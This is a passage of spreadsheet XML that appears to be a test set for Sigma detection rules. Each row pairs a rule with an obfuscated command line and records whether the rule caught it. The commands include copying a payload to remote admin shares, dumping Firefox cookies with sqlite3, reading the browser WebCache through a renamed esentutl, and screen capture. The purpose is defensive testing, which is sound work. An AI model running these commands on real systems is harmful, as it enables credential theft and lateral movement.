          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C94" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D94" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E94" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C c^o^p^y C:\temp\file.txt \\192.168.1.10\C$\Windows\Temp\file.txt</t>
        </is>
      </c>
      <c r="F94" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G94" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H94" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I94" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J94" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K94" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="95" ht="15.75" customHeight="1" s="42">
      <c r="A95" s="44" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B95" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C95" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D95" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E95" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" c^o^p^y C:\temp\file.txt \\192.168.1.10\C$\Windows\Temp\file.txt</t>
        </is>
      </c>
      <c r="F95" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G95" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H95" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I95" s="43" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J95" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K95" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="96" ht="15.75" customHeight="1" s="42">
      <c r="A96" s="44" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B96" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C96" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D96" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E96" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" c^o^p^y C:\temp\file.txt \\192.168.1.10\C$\Windows\Temp\file.txt</t>
        </is>
      </c>
      <c r="F96" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G96" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H96" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I96" s="43" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J96" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K96" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="97" ht="15.75" customHeight="1" s="42">
      <c r="A97" s="44" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B97" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C97" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D97" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E97" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "(Get-Item 'C:\temp\file.txt').CopyTo('\\192.168.1.10\C$\Windows\Temp\file.txt')"</t>
        </is>
      </c>
      <c r="F97" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G97" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H97" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I97" s="44" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33); Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J97" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K97" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="98" ht="15.75" customHeight="1" s="42">
      <c r="A98" s="44" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B98" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C98" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D98" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E98" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "(Get-Item 'C:\temp\file.txt').CopyTo('\\192.168.1.10\C$\Windows\Temp\file.txt')"</t>
        </is>
      </c>
      <c r="F98" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G98" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H98" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I98" s="44" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33); Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J98" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K98" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="99" ht="15.75" customHeight="1" s="42">
      <c r="A99" s="44" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B99" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C99" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D99" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E99" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMAnd "(Get-Item 'C:\temp\file.txt').CopyTo('\\192.168.1.10\C$\Windows\Temp\file.txt')"</t>
        </is>
      </c>
      <c r="F99" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G99" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H99" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I99" s="43" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33); Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J99" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K99" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="100" ht="15.75" customHeight="1" s="42">
      <c r="A100" s="44" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B100" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C100" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D100" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E100" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMaND "(Get-Item 'C:\temp\file.txt').CopyTo('\\192.168.1.10\C$\Windows\Temp\file.txt')"</t>
        </is>
      </c>
      <c r="F100" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G100" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H100" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I100" s="43" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33); Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J100" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K100" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="101" ht="15.75" customHeight="1" s="42">
      <c r="A101" s="44" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B101" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C101" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D101" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E101" s="44" t="inlineStr">
        <is>
          <t>powershell -NoProfile -Command "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F101" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G101" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H101" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I101" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J101" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K101" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="102" ht="15.75" customHeight="1" s="42">
      <c r="A102" s="44" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B102" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C102" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D102" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E102" s="44" t="inlineStr">
        <is>
          <t>powershell -nop -commAND "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F102" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G102" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H102" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I102" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J102" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K102" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="103" ht="15.75" customHeight="1" s="42">
      <c r="A103" s="44" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B103" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C103" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D103" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E103" s="44" t="inlineStr">
        <is>
          <t>powershell -NoPRofILE -comMand "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F103" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G103" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H103" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I103" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J103" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K103" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="104" ht="15.75" customHeight="1" s="42">
      <c r="A104" s="44" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B104" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C104" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D104" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E104" s="44" t="inlineStr">
        <is>
          <t>powershell -nOPrOFiLE -c "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F104" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G104" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H104" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I104" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J104" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K104" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="105" ht="15.75" customHeight="1" s="42">
      <c r="A105" s="44" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B105" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C105" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D105" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E105" s="44" t="inlineStr">
        <is>
          <t>powershell -NoProfILe -cOmmand "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F105" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G105" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H105" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I105" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J105" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K105" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="106" ht="15.75" customHeight="1" s="42">
      <c r="A106" s="43" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B106" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C106" s="43" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D106" s="43" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E106" s="43" t="inlineStr">
        <is>
          <t>powershell -nop -COmMANd "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F106" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G106" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H106" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I106" s="43" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J106" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K106" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="107" ht="15.75" customHeight="1" s="42">
      <c r="A107" s="44" t="inlineStr">
        <is>
          <t>t1056.002</t>
        </is>
      </c>
      <c r="B107" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_mouselock_execution</t>
        </is>
      </c>
      <c r="C107" s="44" t="inlineStr">
        <is>
          <t>PUA - Mouse Lock Execution</t>
        </is>
      </c>
      <c r="D107" s="44" t="inlineStr">
        <is>
          <t>c9192ad9-75e5-43eb-8647-82a0a5b493e3</t>
        </is>
      </c>
      <c r="E107" s="44" t="inlineStr">
        <is>
          <t>copy "C:\Path\To\Mouse Lock_2.0.exe" "C:\Windows\Temp\sys_util.exe" &amp;&amp; "C:\Windows\Temp\sys_util.exe"</t>
        </is>
      </c>
      <c r="F107" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G107" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H107" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I107" s="44" t="inlineStr">
        <is>
          <t>PUA - Mouse Lock Execution (c9192ad9-75e5-43eb-8647-82a0a5b493e3)</t>
        </is>
      </c>
      <c r="J107" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K107" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="108" ht="15.75" customHeight="1" s="42">
      <c r="A108" s="44" t="inlineStr">
        <is>
          <t>t1113</t>
        </is>
      </c>
      <c r="B108" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_psr_capture_screenshots</t>
        </is>
      </c>
      <c r="C108" s="44" t="inlineStr">
        <is>
          <t>Screen Capture Activity Via Psr.EXE</t>
        </is>
      </c>
      <c r="D108" s="44" t="inlineStr">
        <is>
          <t>2158f96f-43c2-43cb-952a-ab4580f32382</t>
        </is>
      </c>
      <c r="E108" s="44" t="inlineStr">
        <is>
          <t>psr.exe  /start /output c:	emp\T1113_desktop.zip /sc 1 /gui 0 /stopevent 12</t>
        </is>
      </c>
      <c r="F108" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G108" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H108" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I108" s="44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J108" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K108" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="109" ht="15.75" customHeight="1" s="42">
      <c r="A109" s="44" t="inlineStr">
        <is>
          <t>t1113</t>
        </is>
      </c>
      <c r="B109" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_psr_capture_screenshots</t>
        </is>
      </c>
      <c r="C109" s="44" t="inlineStr">
        <is>
          <t>Screen Capture Activity Via Psr.EXE</t>
        </is>
      </c>
      <c r="D109" s="44" t="inlineStr">
        <is>
          <t>2158f96f-43c2-43cb-952a-ab4580f32382</t>
        </is>
      </c>
      <c r="E109" s="44" t="inlineStr">
        <is>
          <t>psr.exe "/start" /output c:	emp\T1113_desktop.zip /sc 1 /gui 0 /stopevent 12</t>
        </is>
      </c>
      <c r="F109" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G109" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H109" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I109" s="43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J109" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K109" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="110" ht="15.75" customHeight="1" s="42">
      <c r="A110" s="43" t="inlineStr">
        <is>
          <t>t1560.001</t>
        </is>
      </c>
      <c r="B110" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_user_default_accounts_manipulation</t>
        </is>
      </c>
      <c r="C110" s="43" t="inlineStr">
        <is>
          <t>Suspicious Manipulation Of Default Accounts Via Net.EXE</t>
        </is>
      </c>
      <c r="D110" s="43" t="inlineStr">
        <is>
          <t>5b768e71-86f2-4879-b448-81061cbae951</t>
        </is>
      </c>
      <c r="E110" s="43" t="inlineStr">
        <is>
          <t>net  user  administrator /domain</t>
        </is>
      </c>
      <c r="F110" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G110" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H110" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I110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10" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K110" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="111" ht="15.75" customHeight="1" s="42">
      <c r="A111" s="44" t="inlineStr">
        <is>
          <t>t1005</t>
        </is>
      </c>
      <c r="B111" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_webcache</t>
        </is>
      </c>
      <c r="C111" s="44" t="inlineStr">
        <is>
          <t>Esentutl Steals Browser Information</t>
        </is>
      </c>
      <c r="D111" s="44" t="inlineStr">
        <is>
          <t>6a69f62d-ce75-4b57-8dce-6351eb55b362</t>
        </is>
      </c>
      <c r="E111" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\esentutl.exe C:\Users\Public\not_esentutl.exe &amp;&amp; C:\Users\Public\not_esentutl.exe -"r" %LocalAppData%\Microsoft\Windows\WebCache\WebCacheV01.dat /d</t>
        </is>
      </c>
      <c r="F111" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G111" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H111" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I111" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J111" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K111" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="112" ht="15.75" customHeight="1" s="42">
      <c r="A112" s="44" t="inlineStr">
        <is>
          <t>t1005</t>
        </is>
      </c>
      <c r="B112" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_webcache</t>
        </is>
      </c>
      <c r="C112" s="44" t="inlineStr">
        <is>
          <t>Esentutl Steals Browser Information</t>
        </is>
      </c>
      <c r="D112" s="44" t="inlineStr">
        <is>
          <t>6a69f62d-ce75-4b57-8dce-6351eb55b362</t>
        </is>
      </c>
      <c r="E112" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\esentutl.exe C:\Users\Public\not_esentutl.exe &amp;&amp; C:\Users\Public\not_esentutl.exe /"r" %LocalAppData%\Microsoft\Windows\WebCache\WebCacheV01.dat -"d"</t>
        </is>
      </c>
      <c r="F112" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G112" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H112" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I112" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J112" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K112" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="113" ht="15.75" customHeight="1" s="42">
      <c r="A113" s="44" t="inlineStr">
        <is>
          <t>t1005</t>
        </is>
      </c>
      <c r="B113" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_webcache</t>
        </is>
      </c>
      <c r="C113" s="44" t="inlineStr">
        <is>
          <t>Esentutl Steals Browser Information</t>
        </is>
      </c>
      <c r="D113" s="44" t="inlineStr">
        <is>
          <t>6a69f62d-ce75-4b57-8dce-6351eb55b362</t>
        </is>
      </c>
      <c r="E113" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\esentutl.exe C:\Users\Public\not_esentutl.exe &amp;&amp; C:\Users\Public\not_esentutl.exe /"r" %LocalAppData%\Microsoft\Windows\WebCache\WebCacheV01.dat /"d"</t>
        </is>
      </c>
      <c r="F113" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G113" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H113" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I113" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J113" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K113" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="114" ht="15.75" customHeight="1" s="42">
      <c r="A114" s="43" t="n"/>
      <c r="B114" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sqlite_firefox_gecko_profile_data</t>
        </is>
      </c>
      <c r="C114" s="43" t="inlineStr">
        <is>
          <t>SQLite Firefox Profile Data DB Access</t>
        </is>
      </c>
      <c r="D114" s="43" t="inlineStr">
        <is>
          <t>4833155a-4053-4c9c-a997-777fcea0baa7</t>
        </is>
      </c>
      <c r="E114" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c copy "%APPDATA%\Mozilla\Firefox\Profiles\.default-release\cookies.sqlite" %TEMP%\temp_data.db &amp;&amp; sqlite3.exe %TEMP%\temp_data.db "SELECT * FROM moz_cookies;"</t>
        </is>
      </c>
      <c r="F114" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G114" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H114" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I114" s="43" t="inlineStr">
        <is>
          <t>Potential Browser Data Stealing (47147b5b-9e17-4d76-b8d2-7bac24c5ce1b); Potential Browser Data Stealing (47147b5b-9e17-4d76-b8d2-7bac24c5ce1b)</t>
        </is>
      </c>
      <c r="J114" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K114" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="115" ht="15.75" customHeight="1" s="42">
      <c r="A115" s="44" t="n"/>
      <c r="B115" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sqlite_firefox_gecko_profile_data</t>
        </is>
      </c>
      <c r="C115" s="44" t="inlineStr">
        <is>
          <t>SQLite Firefox Profile Data DB Access</t>
        </is>
      </c>
      <c r="D115" s="44" t="inlineStr">
        <is>
          <t>4833155a-4053-4c9c-a997-777fcea0baa7</t>
        </is>
      </c>
      <c r="E115" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" copy "%APPDATA%\Mozilla\Firefox\Profiles\.default-release\cookies.sqlite" %TEMP%\temp_data.db &amp;&amp; sqlite3.exe %TEMP%\temp_data.db "SELECT * FROM moz_cookies;"</t>
        </is>
      </c>
      <c r="F115" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G115" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H115" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I115" s="43" t="inlineStr">
        <is>
          <t>Potential Browser Data Stealing (47147b5b-9e17-4d76-b8d2-7bac24c5ce1b); Potential Browser Data Stealing (47147b5b-9e17-4d76-b8d2-7bac24c5ce1b)</t>
        </is>
      </c>
      <c r="J115" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K115" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="116" ht="15.75" customHeight="1" s="42">
      <c r="A116" s="44" t="n"/>
      <c r="B116" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sqlite_firefox_gecko_profile_data</t>
        </is>
      </c>
      <c r="C116" s="44" t="inlineStr">
        <is>
          <t>SQLite Firefox Profile Data DB Access</t>
        </is>
      </c>
      <c r="D116" s="44" t="inlineStr">
        <is>
          <t>4833155a-4053-4c9c-a997-777fcea0baa7</t>
        </is>
      </c>
      <c r="E116" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C copy "%APPDATA%\Mozilla\Firefox\Profiles\.default-release\cookies.sqlite" %TEMP%\temp_data.db &amp;&amp; sqlite3.exe %TEMP%\temp_data.db "SELECT * FROM moz_cookies;"</t>
        </is>
      </c>
      <c r="F116" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G116" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H116" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I116" s="44" t="inlineStr">
        <is>
          <t>Potential Browser Data Stealing (47147b5b-9e17-4d76-b8d2-7bac24c5ce1b); Potential Browser Data Stealing (47147b5b-9e17-4d76-b8d2-7bac24c5ce1b)</t>
        </is>
      </c>
      <c r="J116" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K116" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="117" ht="15.75" customHeight="1" s="42">
      <c r="A117" s="44" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B117" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C117" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D117" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E117" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" \"type C:\\temp\\payload.exe &gt; \\\\10.0.0.2\\Admin\payload.exe"</t>
        </is>
      </c>
      <c r="F117" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G117" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H117" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I117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17" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K117" s="44" t="b">
        <v>0</v>
      </c>
